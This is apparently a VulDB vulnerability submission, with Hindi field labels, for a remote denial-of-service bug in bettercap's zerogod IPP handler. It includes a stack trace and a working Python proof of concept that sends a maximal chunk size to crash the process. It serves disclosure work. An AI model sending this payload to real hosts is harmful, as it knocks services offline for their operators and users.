| शीर्षक | bettercap <=v2.41.5 Integer Coercion Error |
|---|
| विवरण | zerogod IPP Chunked Body - Unrecovered Panic via OOB uint64 Allocation
The `zerogod IPP` handler crashes entire process on crafted chunked request (remote DoS). @evilsocket
### Environment
- Bettercap version: v2.41.5 (bettercap -version)
- OS: Linux (tested on Kali 6.18.12 amd64; issue is OS-independent)
- Go version: go1.26.1
- Command line:
```
sudo bettercap -iface eth0 -eval "zerogod.advertise /path/to/services.yaml"
```
- Caplet / session commands: none beyond the eval above
- services.yaml:
```
- name: "My Printer"
service: "_ipp._tcp."
domain: "local"
port: 63100
ipp:
printer-name: "My Printer"
printer-info: "Test"
printer-make-and-model: "Test Make Test Model"
printer-location: "Office"
```
```
[zerogod] found tcp _ipp._tcp.local protocol handler (tls=false)
[zerogod] advertising My Printer._ipp._tcp.local with hostname=kali ipv4=192.168.1.x port=63100
[zerogod] 127.0.0.1 ->
panic: runtime error: makeslice: len out of range
goroutine 65 [running]:
github.com/bettercap/bettercap/v2/modules/zerogod.ippReadChunkedBody(0x2a03cf542cc0)
.../modules/zerogod/zerogod_ipp_primitives.go:140 +0xa5
github.com/bettercap/bettercap/v2/modules/zerogod.ippReadRequestBody(0x2a03cf542cc0, 0x2a03cf56f2c0)
.../modules/zerogod/zerogod_ipp_primitives.go:166 +0x1fd
github.com/bettercap/bettercap/v2/modules/zerogod.ippClientHandler(0x2a03cf542cc0)
.../modules/zerogod/zerogod_ipp_handler.go:50 +0x29a
created by github.com/bettercap/bettercap/v2/modules/zerogod.(*Acceptor).startTCP.func1 in goroutine 61
.../modules/zerogod/zerogod_acceptor.go:120 +0x53a
```
### Steps to Reproduce
1. Start bettercap with zerogod advertising any IPP service (see YAML above).
2. Confirm the IPP TCP port is listening (ss -tlnp | grep 63100).
3. From any machine on the same network, run the following Python snippet:
```
import socket, time
s = socket.socket()
s.connect(("192.168.1.x", 63100)) # replace with bettercap host IP
# Step 1 – send HTTP request with Expect: 100-continue + Transfer-Encoding: chunked
s.sendall(
b"POST /ipp HTTP/1.1\r\n"
b"Host: 192.168.1.x:63100\r\n"
b"Content-Type: application/ipp\r\n"
b"Transfer-Encoding: chunked\r\n"
b"Expect: 100-continue\r\n"
b"\r\n"
)
# Step 2 – wait for 100 Continue, then send uint64-max as chunk size
print(s.recv(4096)) # b'HTTP/1.1 100 Continue\r\n\r\n'
s.sendall(b"ffffffffffffffff\r\n") # triggers make([]byte, uint64(max)) → panic
|
|---|
| स्रोत | ⚠️ https://github.com/bettercap/bettercap/issues/1263 |
|---|
| उपयोगकर्ता | dapickle (UID 97309) |
|---|
| सबमिशन | 23/04/2026 08:49 AM (1 महीना पहले) |
|---|
| संयम | 10/05/2026 06:05 PM (17 days later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 362572 [bettercap तक 2.41.5 zerogod IPP Service zerogod_ipp_primitives.go ippReadChunkedBody सेवा अस्वीकार] |
|---|
| अंक | 20 |
|---|